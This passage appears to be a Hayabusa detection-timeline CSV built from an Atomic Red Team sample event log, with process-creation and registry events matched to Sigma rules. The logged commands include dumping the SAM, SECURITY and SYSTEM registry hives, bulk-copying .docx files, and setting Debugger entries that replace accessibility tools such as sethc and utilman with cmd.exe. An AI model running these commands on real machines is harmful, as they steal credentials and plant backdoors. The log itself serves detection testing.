""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM 
sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b 
/s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor 
Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 
+09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys 
